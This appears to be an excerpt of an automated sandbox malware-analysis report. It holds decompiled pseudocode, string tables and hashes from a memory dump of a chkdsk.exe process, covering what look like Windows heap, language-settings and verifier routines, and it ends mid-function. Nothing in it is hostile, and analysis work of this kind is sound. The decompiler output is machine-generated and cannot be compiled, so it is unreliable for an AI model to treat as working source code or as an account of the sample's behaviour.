                                                                                                                    • Critical section address., xrefs: 058C530D
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: 8$Address of the debug info found in the active list.$Critical section address$Critical section address.$Critical section debug info address$First initialization stack trace. Use dps to dump it if non-NULL.$Initialization stack trace. Use dps to dump it if non-NULL.$Invalid debug info address of this critical section$Second initialization stack trace. Use dps to dump it if non-NULL.$Thread identifier$Thread is in a state in which it cannot own a critical section$corrupted critical section$double initialized or corrupted critical section$undeleted critical section in freed memory
                                                                                                                    • API String ID: 0-2368682639
                                                                                                                    • Opcode ID: 48740130ae66158a177f39bf2e97f1e04cf0149394be1e00861a4e375b5f137b
                                                                                                                    • Instruction ID: d55f654ba6e7fd1deb228115862cdf9703dc36b3582ce4c876240dde131cb899
                                                                                                                    • Opcode Fuzzy Hash: 48740130ae66158a177f39bf2e97f1e04cf0149394be1e00861a4e375b5f137b
                                                                                                                    • Instruction Fuzzy Hash: D18157B1A41358AADF20CB94C945BAEBBF5FB48B14F204159FD05E7280D7B8AD44CFA0
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058F86C2 Relevance: 12.6, Strings: 10, Instructions: 146COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 77%
                                                                                                                    			E058F86C2(void* __ebx, signed short* __ecx, signed short __edx) {
				signed int _v8;
				char _v268;
				char _v300;
				char* _v304;
				char* _v308;
				char* _v312;
				char* _v316;
				char* _v320;
				char* _v324;
				char _v1076;
				signed int _v1084;
				signed int _v1092;
				signed short _v1096;
				void* __edi;
				void* __esi;
				signed int _t54;
				short* _t59;
				void* _t65;
				signed int _t66;
				void* _t67;
				intOrPtr _t69;
				void* _t74;
				void* _t75;
				void* _t80;
				void* _t81;
				signed short _t82;
				signed short* _t84;
				void* _t85;
				intOrPtr* _t86;
				signed int _t90;
				void* _t92;
				signed int _t93;
				signed int _t95;

				_t82 = __edx;
				_t75 = __ebx;
				_t95 = (_t93 & 0xfffffff8) - 0x448;
				_v8 =  *0x594b370 ^ _t95;
				_t84 = __ecx;
				_v324 = L"svchost.exe";
				_v320 = L"runtimebroker.exe";
				_t90 = 0;
				_v316 = L"csrss.exe";
				_v312 = L"smss.exe";
				_v308 = L"services.exe";
				_v304 = L"lsass.exe";
				_v1084 =  *[fs:0x30];
				if((E05850670() & 0x00010000) != 0) {
					L26:
					 *0x59438c0 = _t90;
					_t90 = 1;
				} else {
					if(E058542B0(0, 0, L"http://schemas.microsoft.com/SMI/2020/WindowsSettings", L"heapType",  &_v300, 0xf, 0) < 0) {
						L3:
						_t54 = _v1084;
						if(( *(_t54 + 3) & 0x00000010) == 0) {
							if( *((intOrPtr*)( *((intOrPtr*)(_t54 + 0x10)) + 0x2b0)) != _t90) {
								goto L26;
							} else {
								if(_t84 != 0) {
									_t79 = _t90;
									_t82 = _t84[2];
									_t59 = _t82 + ((( *_t84 & 0x0000ffff) >> 1) - 1) * 2;
									while(1) {
										_v1092 = _t79;
										if(_t59 <= _t82) {
											break;
										}
										if( *_t59 == 0x5c) {
											if(_t79 == 0) {
												L24:
												_v1096 = 0x100;
												if(E05884E50(0xfffffffc,  &_v268,  &_v1096, _t90, _t90, _t90,  &_v1084) >= 0) {
													_t65 = E05897AD0( &_v268, L"DefaultBrowser_NOPUBLISHERID", 0x1d);
													_t95 = _t95 + 0xc;
													if(_t65 == 0) {
														goto L26;
													}
												}
											} else {
												_t28 = _t59 + 2; // 0x2
												_t82 = _t28;
												_v1096 = _t82;
												if(_t82 != 0) {
													_t66 = _t90;
													_v1084 = _t90;
													do {
														_t86 =  *((intOrPtr*)(_t95 + 0x310 + _t66 * 4));
														_t67 = E05897AD0(_t82, _t86, _t79);
														_t95 = _t95 + 0xc;
														if(_t67 != 0) {
															_t79 = _v1092;
															goto L23;
														} else {
															_t34 = _t86 + 2; // 0x582708e
															_t80 = _t34;
															do {
																_t69 =  *_t86;
																_t86 = _t86 + 2;
															} while (_t69 != _t90);
															_t79 = _v1092;
															if(_v1092 == _t86 - _t80 >> 1) {
																goto L26;
															} else {
																goto L23;
															}
														}
														goto L27;
														L23:
														_t82 = _v1096;
														_t66 = _v1084 + 1;
														_v1084 = _t66;
													} while (_t66 < 6);
												}
												goto L24;
											}
										} else {
											_t79 = _t79 + 1;
											_t59 = _t59 - 2;
											continue;
										}
										goto L27;
									}
									goto L24;
								}
							}
						} else {
							_push(_t90);
							_push( &_v1092);
							_push( &_v1076);
							_t81 = 0xfffffffc;
							if(E05884F11(_t81) < 0 || (_v1092 & 0x00008000) == 0) {
								goto L26;
							} else {
							}
						}
					} else {
						_t74 = E05897AD0( &_v300, L"SegmentHeap", 0xf);
						_t95 = _t95 + 0xc;
						if(_t74 == 0) {
							goto L26;
						} else {
							goto L3;
						}
					}
				}
				L27:
				_pop(_t85);
				_pop(_t92);
				return E05894B50(_t90, _t75, _v8 ^ _t95, _t82, _t85, _t92);
			}




































                                                                                                                    0x058f86c2
                                                                                                                    0x058f86c2
                                                                                                                    0x058f86ca
                                                                                                                    0x058f86d7
                                                                                                                    0x058f86e6
                                                                                                                    0x058f86e8
                                                                                                                    0x058f86f3
                                                                                                                    0x058f86fe
                                                                                                                    0x058f8700
                                                                                                                    0x058f870b
                                                                                                                    0x058f8716
                                                                                                                    0x058f8721
                                                                                                                    0x058f872c
                                                                                                                    0x058f873a
                                                                                                                    0x058f8892
                                                                                                                    0x058f8892
                                                                                                                    0x058f889a
                                                                                                                    0x058f8740
                                                                                                                    0x058f875e
                                                                                                                    0x058f877f
                                                                                                                    0x058f877f
                                                                                                                    0x058f8787
                                                                                                                    0x058f87c0
                                                                                                                    0x00000000
                                                                                                                    0x058f87c6
                                                                                                                    0x058f87c8
                                                                                                                    0x058f87d1
                                                                                                                    0x058f87d3
                                                                                                                    0x058f87d9
                                                                                                                    0x058f87e8
                                                                                                                    0x058f87e8
                                                                                                                    0x058f87ee
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058f87e2
                                                                                                                    0x058f87f4
                                                                                                                    0x058f884f
                                                                                                                    0x058f8853
                                                                                                                    0x058f8875
                                                                                                                    0x058f8886
                                                                                                                    0x058f888b
                                                                                                                    0x058f8890
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058f8890
                                                                                                                    0x058f87f6
                                                                                                                    0x058f87f6
                                                                                                                    0x058f87f6
                                                                                                                    0x058f87f9
                                                                                                                    0x058f87ff
                                                                                                                    0x058f8801
                                                                                                                    0x058f8803
                                                                                                                    0x058f8807
                                                                                                                    0x058f8807
                                                                                                                    0x058f8811
                                                                                                                    0x058f8816
                                                                                                                    0x058f881b
                                                                                                                    0x058f8839
                                                                                                                    0x00000000
                                                                                                                    0x058f881d
                                                                                                                    0x058f881d
                                                                                                                    0x058f881d
                                                                                                                    0x058f8820
                                                                                                                    0x058f8820
                                                                                                                    0x058f8823
                                                                                                                    0x058f8826
                                                                                                                    0x058f882d
                                                                                                                    0x058f8835
                                                                                                                    0x00000000
                                                                                                                    0x058f8837
                                                                                                                    0x00000000
                                                                                                                    0x058f8837
                                                                                                                    0x058f8835
                                                                                                                    0x00000000
                                                                                                                    0x058f883d
                                                                                                                    0x058f8841
                                                                                                                    0x058f8845
                                                                                                                    0x058f8846
                                                                                                                    0x058f884a
                                                                                                                    0x058f8807
                                                                                                                    0x00000000
                                                                                                                    0x058f87ff
                                                                                                                    0x058f87e4
                                                                                                                    0x058f87e4
                                                                                                                    0x058f87e5
                                                                                                                    0x00000000
                                                                                                                    0x058f87e5
                                                                                                                    0x00000000
                                                                                                                    0x058f87e2
                                                                                                                    0x00000000
                                                                                                                    0x058f87f0
                                                                                                                    0x058f87c8
                                                                                                                    0x058f8789
                                                                                                                    0x058f8789
                                                                                                                    0x058f878e
                                                                                                                    0x058f8793
                                                                                                                    0x058f8796
                                                                                                                    0x058f879e
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058f87b2
                                                                                                                    0x058f879e
                                                                                                                    0x058f8760
                                                                                                                    0x058f876f
                                                                                                                    0x058f8774
                                                                                                                    0x058f8779
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058f8779
                                                                                                                    0x058f875e
                                                                                                                    0x058f889b
                                                                                                                    0x058f88a4
                                                                                                                    0x058f88a5
                                                                                                                    0x058f88b0

                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: DefaultBrowser_NOPUBLISHERID$SegmentHeap$csrss.exe$heapType$http://schemas.microsoft.com/SMI/2020/WindowsSettings$lsass.exe$runtimebroker.exe$services.exe$smss.exe$svchost.exe
                                                                                                                    • API String ID: 0-2515994595
                                                                                                                    • Opcode ID: 40d9c23f9c9fc401072445abf8069f04e8511d1d8805c0284714eb61d22490a8
                                                                                                                    • Instruction ID: 9a4d88587beb13debc81c6135471db9a4d86488f1201a973a8c0b0f4e8a51b80
                                                                                                                    • Opcode Fuzzy Hash: 40d9c23f9c9fc401072445abf8069f04e8511d1d8805c0284714eb61d22490a8
                                                                                                                    • Instruction Fuzzy Hash: 6551B1716183159BD325DF199845BABBBE8FF88754F04492DBE59C3240E730DE48CB92
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 0584D02D Relevance: 10.2, Strings: 8, Instructions: 249COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 83%
                                                                                                                    			E0584D02D(void* __ecx, intOrPtr* __edx, intOrPtr _a4) {
				char* _v28;
				signed int _v32;
				char _v36;
				signed int _v40;
				signed int _v44;
				intOrPtr _v48;
				char* _v52;
				intOrPtr _v56;
				char _v60;
				signed int _v64;
				signed int _v68;
				intOrPtr _v72;
				char _v84;
				signed int _v88;
				signed int _v92;
				intOrPtr _v96;
				char* _v100;
				intOrPtr _v104;
				char _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				char* _v124;
				signed int _v128;
				char _v132;
				char _v140;
				signed int _v144;
				char _v145;
				char _v148;
				signed int _v152;
				void* _v156;
				void* _v157;
				signed int _v160;
				void* _v161;
				signed int _v164;
				signed int _v168;
				void* _v172;
				void* _v180;
				void* _v188;
				intOrPtr _t111;
				void* _t128;
				void* _t160;
				intOrPtr _t162;
				intOrPtr _t164;
				intOrPtr* _t179;
				void* _t182;
				char _t184;
				signed int _t185;
				void* _t187;
				void* _t196;

				_t187 = (_t185 & 0xfffffff8) - 0x9c;
				_t160 = __ecx;
				_t179 = __edx;
				_v128 = 0;
				_v160 = 0;
				_v144 = 0;
				_v152 = 0;
				if(__edx == 0 || _a4 == 0) {
					_t182 = 0xc000000d;
					goto L11;
				} else {
					_v128 =  *__edx;
					E05895050(__ecx,  &_v140, L"\\Registry\\Machine\\Software\\Policies\\Microsoft\\MUI\\Settings");
					_t184 = 0x18;
					_v132 = _t184;
					_v124 =  &_v148;
					_v128 = 0;
					_push( &_v132);
					_push(0x20019);
					_v120 = 0x40;
					_push( &_v168);
					_v116 = 0;
					_v112 = 0;
					if(E05892AB0() >= 0) {
						_t182 = E0590ADD6(_v160, _a4,  &_v145,  &_v132);
						if(_t182 >= 0) {
							L11:
							if(_v160 != 0) {
								_push(_v160);
								E05892A80();
							}
							if(_v144 != 0) {
								_push(_v144);
								E05892A80();
							}
							if(_v152 != 0) {
								_push(_v152);
								E05892A80();
							}
							if(_t182 < 0) {
								if(_t179 == 0) {
									goto L19;
								}
								_t162 = _v128;
								if( *_t179 == _t162) {
									goto L19;
								}
								if( *_t179 != 0) {
									E05863BC0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *_t179);
								}
								goto L44;
							} else {
								if( *_t179 != 0) {
									L19:
									return _t182;
								}
								_t111 = E0584DAA8(1);
								 *_t179 = _t111;
								if(_t111 == 0) {
									_t162 = _v128;
									_t182 = 0xc0000017;
									L44:
									 *_t179 = _t162;
								}
								goto L19;
							}
						}
						if(_t160 == 8) {
							 *((char*)(_t187 + 0x13)) = 0;
							if(E0590AD61(_v160, _t187 + 0x13) == 0 &&  *((char*)(_t187 + 0x13)) == 1) {
								_t160 = 4;
							}
						}
						_push(_v160);
						E05892A80();
						_v164 = _v164 & 0x00000000;
						_t184 = 0x18;
					}
					_t170 = 0x2000000;
					if(E0584D736(0x2000000,  &_v152) < 0) {
						_v152 = _v152 & 0x00000000;
					}
					if(_t160 != 8) {
						if(_t160 != 4) {
							goto L25;
						}
						if(_v152 == 0) {
							_t128 = 0xc0000034;
						} else {
							E05895050(_t170,  &_v140, L"Control Panel\\Desktop\\MuiCached\\MachineLanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v44 = _v44 & 0x00000000;
							_v40 = _v40 & 0x00000000;
							_v56 = _v160;
							_v52 =  &_v148;
							_push( &_v60);
							_push(0x20019);
							_v60 = _t184;
							_push( &_v168);
							_v48 = 0x40;
							_t128 = E05892AB0();
						}
						if(_t128 < 0) {
							E05895050(_t170,  &_v140, L"\\Registry\\Machine\\System\\CurrentControlSet\\Control\\MUI\\Settings\\LanguageConfiguration");
							_v168 = _v168 & 0x00000000;
							_v32 = _v32 & 0x00000000;
							 *(_t187 + 0xa0) =  *(_t187 + 0xa0) & 0x00000000;
							 *(_t187 + 0xa4) =  *(_t187 + 0xa4) & 0x00000000;
							_v28 =  &_v148;
							_push( &_v36);
							_push(0x20019);
							_v36 = _t184;
							_push( &_v168);
							 *((intOrPtr*)(_t187 + 0xa8)) = 0x40;
							_t182 = E05892AB0();
							if(_t182 < 0) {
								goto L9;
							}
						}
						goto L25;
					} else {
						if(_v152 == 0) {
							L10:
							_t182 = 0;
							goto L11;
						}
						E05895050(_t170,  &_v140, L"Software\\Policies\\Microsoft\\Control Panel\\Desktop");
						_v92 = _v92 & 0x00000000;
						_v88 = _v88 & 0x00000000;
						_v104 = _v160;
						_t164 = 0x40;
						_v100 =  &_v148;
						_push( &_v108);
						_push(0x20019);
						_v108 = _t184;
						_push( &_v152);
						_v96 = _t164;
						if(E05892AB0() >= 0) {
							_t170 = _v144;
							_t182 = E0590ADD6(_v144, _a4,  &_v145,  &_v132);
							if(_t182 >= 0) {
								goto L11;
							}
							_t184 = 0x18;
						}
						E05895050(_t170,  &_v140, L"Control Panel\\Desktop\\LanguageConfiguration");
						_v168 = _v168 & 0x00000000;
						_v68 = _v68 & 0x00000000;
						_v64 = _v64 & 0x00000000;
						 *((intOrPtr*)(_t187 + 0x64)) = _v160;
						 *((intOrPtr*)(_t187 + 0x68)) =  &_v148;
						_push( &_v84);
						_push(0x20019);
						_v84 = _t184;
						_push( &_v168);
						_v72 = _t164;
						_t182 = E05892AB0();
						if(_t182 >= 0) {
							L25:
							_t182 = E0584D9A2(_v160, _t179, _a4);
							goto L11;
						} else {
							_t196 = _t182 - 0xc0000034;
							L9:
							if(_t196 != 0) {
								goto L11;
							}
							goto L10;
						}
					}
				}
			}





















































                                                                                                                    0x0584d035
                                                                                                                    0x0584d03f
                                                                                                                    0x0584d042
                                                                                                                    0x0584d044
                                                                                                                    0x0584d048
                                                                                                                    0x0584d04c
                                                                                                                    0x0584d050
                                                                                                                    0x0584d056
                                                                                                                    0x058aa5a1
                                                                                                                    0x00000000
                                                                                                                    0x0584d065
                                                                                                                    0x0584d067
                                                                                                                    0x0584d075
                                                                                                                    0x0584d07c
                                                                                                                    0x0584d081
                                                                                                                    0x0584d085
                                                                                                                    0x0584d08f
                                                                                                                    0x0584d093
                                                                                                                    0x0584d094
                                                                                                                    0x0584d09d
                                                                                                                    0x0584d0a5
                                                                                                                    0x0584d0a6
                                                                                                                    0x0584d0aa
                                                                                                                    0x0584d0b5
                                                                                                                    0x058aa52a
                                                                                                                    0x058aa52e
                                                                                                                    0x0584d194
                                                                                                                    0x0584d199
                                                                                                                    0x0584d19b
                                                                                                                    0x0584d19f
                                                                                                                    0x0584d19f
                                                                                                                    0x0584d1a9
                                                                                                                    0x058aa5ab
                                                                                                                    0x058aa5af
                                                                                                                    0x058aa5af
                                                                                                                    0x0584d1b4
                                                                                                                    0x0584d1b6
                                                                                                                    0x0584d1ba
                                                                                                                    0x0584d1ba
                                                                                                                    0x0584d1c1
                                                                                                                    0x058aa5bb
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058aa5c1
                                                                                                                    0x058aa5c7
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058aa5d0
                                                                                                                    0x058aa5df
                                                                                                                    0x058aa5df
                                                                                                                    0x00000000
                                                                                                                    0x0584d1c7
                                                                                                                    0x0584d1ca
                                                                                                                    0x0584d1de
                                                                                                                    0x0584d1e6
                                                                                                                    0x0584d1e6
                                                                                                                    0x0584d1cf
                                                                                                                    0x0584d1d4
                                                                                                                    0x0584d1d8
                                                                                                                    0x058aa5e6
                                                                                                                    0x058aa5ea
                                                                                                                    0x058aa5ef
                                                                                                                    0x058aa5ef
                                                                                                                    0x058aa5ef
                                                                                                                    0x00000000
                                                                                                                    0x0584d1d8
                                                                                                                    0x0584d1c1
                                                                                                                    0x058aa537
                                                                                                                    0x058aa541
                                                                                                                    0x058aa54d
                                                                                                                    0x058aa558
                                                                                                                    0x058aa558
                                                                                                                    0x058aa54d
                                                                                                                    0x058aa559
                                                                                                                    0x058aa55d
                                                                                                                    0x058aa562
                                                                                                                    0x058aa569
                                                                                                                    0x058aa569
                                                                                                                    0x0584d0bf
                                                                                                                    0x0584d0cc
                                                                                                                    0x058aa56f
                                                                                                                    0x058aa56f
                                                                                                                    0x0584d0d5
                                                                                                                    0x0584d1ec
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0584d1fc
                                                                                                                    0x0584d2de
                                                                                                                    0x0584d202
                                                                                                                    0x0584d20c
                                                                                                                    0x0584d215
                                                                                                                    0x0584d21a
                                                                                                                    0x0584d222
                                                                                                                    0x0584d22a
                                                                                                                    0x0584d232
                                                                                                                    0x0584d23d
                                                                                                                    0x0584d23e
                                                                                                                    0x0584d247
                                                                                                                    0x0584d24e
                                                                                                                    0x0584d24f
                                                                                                                    0x0584d25a
                                                                                                                    0x0584d25a
                                                                                                                    0x0584d261
                                                                                                                    0x0584d26d
                                                                                                                    0x0584d272
                                                                                                                    0x0584d27b
                                                                                                                    0x0584d283
                                                                                                                    0x0584d28b
                                                                                                                    0x0584d293
                                                                                                                    0x0584d2a1
                                                                                                                    0x0584d2a2
                                                                                                                    0x0584d2ab
                                                                                                                    0x0584d2b2
                                                                                                                    0x0584d2b3
                                                                                                                    0x0584d2c3
                                                                                                                    0x0584d2c7
                                                                                                                    0x00000000
                                                                                                                    0x0584d2e5
                                                                                                                    0x0584d2c7
                                                                                                                    0x00000000
                                                                                                                    0x0584d0db
                                                                                                                    0x0584d0e0
                                                                                                                    0x0584d192
                                                                                                                    0x0584d192
                                                                                                                    0x00000000
                                                                                                                    0x0584d192
                                                                                                                    0x0584d0f0
                                                                                                                    0x0584d0f9
                                                                                                                    0x0584d0fe
                                                                                                                    0x0584d103
                                                                                                                    0x0584d10d
                                                                                                                    0x0584d10e
                                                                                                                    0x0584d116
                                                                                                                    0x0584d117
                                                                                                                    0x0584d120
                                                                                                                    0x0584d124
                                                                                                                    0x0584d125
                                                                                                                    0x0584d130
                                                                                                                    0x058aa580
                                                                                                                    0x058aa58f
                                                                                                                    0x058aa593
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x058aa59b
                                                                                                                    0x058aa59b
                                                                                                                    0x0584d140
                                                                                                                    0x0584d149
                                                                                                                    0x0584d14e
                                                                                                                    0x0584d153
                                                                                                                    0x0584d158
                                                                                                                    0x0584d160
                                                                                                                    0x0584d168
                                                                                                                    0x0584d169
                                                                                                                    0x0584d172
                                                                                                                    0x0584d176
                                                                                                                    0x0584d177
                                                                                                                    0x0584d180
                                                                                                                    0x0584d184
                                                                                                                    0x0584d2c9
                                                                                                                    0x0584d2d7
                                                                                                                    0x00000000
                                                                                                                    0x0584d18a
                                                                                                                    0x0584d18a
                                                                                                                    0x0584d190
                                                                                                                    0x0584d190
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x00000000
                                                                                                                    0x0584d190
                                                                                                                    0x0584d184
                                                                                                                    0x0584d0d5

                                                                                                                    Strings
                                                                                                                    • \Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration, xrefs: 0584D263
                                                                                                                    • @, xrefs: 0584D09D
                                                                                                                    • Control Panel\Desktop\MuiCached\MachineLanguageConfiguration, xrefs: 0584D202
                                                                                                                    • Software\Policies\Microsoft\Control Panel\Desktop, xrefs: 0584D0E6
                                                                                                                    • @, xrefs: 0584D24F
                                                                                                                    • @, xrefs: 0584D2B3
                                                                                                                    • Control Panel\Desktop\LanguageConfiguration, xrefs: 0584D136
                                                                                                                    • \Registry\Machine\Software\Policies\Microsoft\MUI\Settings, xrefs: 0584D06F
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: @$@$@$Control Panel\Desktop\LanguageConfiguration$Control Panel\Desktop\MuiCached\MachineLanguageConfiguration$Software\Policies\Microsoft\Control Panel\Desktop$\Registry\Machine\Software\Policies\Microsoft\MUI\Settings$\Registry\Machine\System\CurrentControlSet\Control\MUI\Settings\LanguageConfiguration
                                                                                                                    • API String ID: 0-1356375266
                                                                                                                    • Opcode ID: 9baee0677e8df86ddd5f0f150159b8163f8b91b547c177e6b664721e2aa153df
                                                                                                                    • Instruction ID: b82e0dcbd8fb23c3d159808eafb476d4724ae124894a50af68d7ee63d858b909
                                                                                                                    • Opcode Fuzzy Hash: 9baee0677e8df86ddd5f0f150159b8163f8b91b547c177e6b664721e2aa153df
                                                                                                                    • Instruction Fuzzy Hash: D3A117726093499FE721DE55C484BABB7E8BB84719F00492EED89D6240E774DD08CF93
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058FF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    Strings
                                                                                                                    Memory Dump Source
                                                                                                                    • Source File: 00000016.00000002.7447991508.0000000005820000.00000040.00001000.00020000.00000000.sdmp, Offset: 05820000, based on PE: true
                                                                                                                    • Associated: 00000016.00000002.7447991508.0000000005949000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    • Associated: 00000016.00000002.7447991508.000000000594D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                    • Snapshot File: hcaresult_22_2_5820000_chkdsk.jbxd
                                                                                                                    Similarity
                                                                                                                    • API ID:
                                                                                                                    • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                    • API String ID: 0-2224505338
                                                                                                                    • Opcode ID: eee6daae9ab98d7b5c4eebb2d7b188197aa5a7b73e7e2d24b17706a8bb68cbbb
                                                                                                                    • Instruction ID: f041e213f5b3f2ad86ec0a6b00b59c026a4a3b3fb150acbcaf5afddcc049f813
                                                                                                                    • Opcode Fuzzy Hash: eee6daae9ab98d7b5c4eebb2d7b188197aa5a7b73e7e2d24b17706a8bb68cbbb
                                                                                                                    • Instruction Fuzzy Hash: 59510236245298EFDB11DF68C888E2ABBE4EF08A64F148456FE02DB351DA79DD40DF11
                                                                                                                    Uniqueness

                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                    Function 058D8633 Relevance: 9.0, Strings: 7, Instructions: 259COMMON
                                                                                                                    Download Yara Rule
                                                                                                                    C-Code - Quality: 90%
                                                                                                                    			E058D8633(char __ecx, intOrPtr __edx, signed int _a4, intOrPtr _a8, intOrPtr _a12, signed int _a16) {
				intOrPtr _v0;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				char _v24;
				char _v28;
				char _v29;
				signed int _v30;
				char _v31;
				intOrPtr _v32;
				signed int _v48;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t50;
				signed int _t51;
				signed int _t52;
				intOrPtr _t69;
				signed int _t76;
				signed int _t88;
				intOrPtr _t92;
				signed int _t97;
				signed int _t103;
				signed int _t121;
				intOrPtr* _t124;
				intOrPtr _t126;
				signed int _t127;
				signed int _t128;
				intOrPtr* _t130;

				_t115 = __edx;
				_t103 = __ecx;
				_t97 = 0;
				_v8 = __edx;
				_v31 = __ecx;
				_t126 =  *[fs:0x30];
				_v12 = _t126;
				_v24 = 0;
				_v28 = 0;
				_t50 = _a8;
				if(_t50 == 0) {
					_t121 = _a16;
					__eflags = _t121;
					if(_t121 != 0) {
						 *_t121 = 0;
						__eflags =  *(_t126 + 0x68) & 0x02000100;
						if(( *(_t126 + 0x68) & 0x02000100) == 0) {
							_t51 = E058D36EC();
							_t103 = _v31;
							__eflags = _t51;
							if(_t51 != 0) {
								_v28 = 2;
							}
						} else {
							_v28 = 1;
						}
						__eflags =  *(_t126 + 0x68) & 0x00000100;
						if(( *(_t126 + 0x68) & 0x00000100) != 0) {
							L35:
							_t52 = 0x48004;
							goto L36;
						} else {
							__eflags = _t103;
							if(_t103 != 0) {
								goto L35;
							}
							_t52 = 0;
							L36:
							_t127 = _a4;
							 *0x5945a74 = _t52;
							 *0x5945000 = 0;
							__eflags = _t127;
							if(_t127 == 0) {
								L40:
								__eflags = _v31;
								if(_v31 != 0) {
									 *0x5945238 = 1;
								}
								L42:
								__eflags = _t127;
								if(__eflags != 0) {
									__eflags = _t52 & 0x00000004;
									if((_t52 & 0x00000004) != 0) {
										E05846CC0(_t127, L"HandleTraces", 4, 0x59469d8, 4, 0);
									}
									E05846CC0(_t127, L"VerifierDebug", 4, 0x59469dc, 4, 0);
									E05846CC0(_t127, L"VerifierDlls", 1, 0x5945000, 0x200, 0);
								}
								_t116 = _v8;
								_t128 = E058D98B2(0x5821b98, _v8, __eflags, _t127, _a12, 0x5945260);
								__eflags = _t128;
								if(_t128 >= 0) {
									 *_t121 = 0x5945260;
									_t128 = E058D8FBB();
									__eflags = _t128;
									if(_t128 >= 0) {
										E05881D66(0x5821b98, _t116, 0);
										 *0x5949234 = _v32;
										E05881D66(0x5821b98, _t116, 1);
									}
								}
								L49:
								return _t128;
							}
							E05846CC0(_t127, L"VerifierFlags", 4,  &_v24, 4, 0);
							_t52 = _v48;
							__eflags = _t52;
							if(_t52 == 0) {
								_t52 =  *0x5945a74; // 0x0
								goto L40;
							}
							 *0x5945a74 = _t52;
							goto L42;
						}
					}
					_t128 = 0xc000000d;
					goto L49;
				}
				if(_t50 != 1) {
					L25:
					_t128 = _t97;
					goto L49;
				}
				 *0x5945244 = 0x5945240;
				 *0x5945240 = 0x5945240;
				_t128 = E0587FBC0(0x5945220, 0, 0);
				if(_t128 < 0) {
					goto L49;
				}
				if( *0x5949234 == 2) {
					_v29 = 0;
					_t128 = E05871934(0x5945308, 0,  &_v29);
					__eflags = _t128;
					if(_t128 < 0) {
						goto L49;
					}
					goto L25;
				}
				_push( *0x5945a74);
				_push( *((intOrPtr*)( *[fs:0x18] + 0x20)));
				_t69 =  *0x5945d8c; // 0x5291e18
				_t8 = _t69 + 0x30; // 0x5290fe0
				E058DEF10(0x5d, 0, "AVRF: %ws: pid 0x%X: flags 0x%X: application verifier enabled\n",  *_t8);
				if(E058D9429(_t115) >= 0) {
					_t130 =  *0x5945240; // 0x0
					while(1) {
						__eflags = _t130 - 0x5945240;
						if(__eflags == 0) {
							break;
						}
						_t71 = E058D919C(_t97, _t130, 0x5945240, _t130, __eflags);
						__eflags = _t71;
						if(_t71 == 0) {
							_t128 = 0xc0000142;
							goto L49;
						} else {
							_t130 =  *_t130;
							continue;
						}
					}
					E058D8B5E(_t71);
					_t108 = 0x5821b88;
					_t128 = E0586F380(0x5821b88, 0, _t97,  &_v20, _t97);
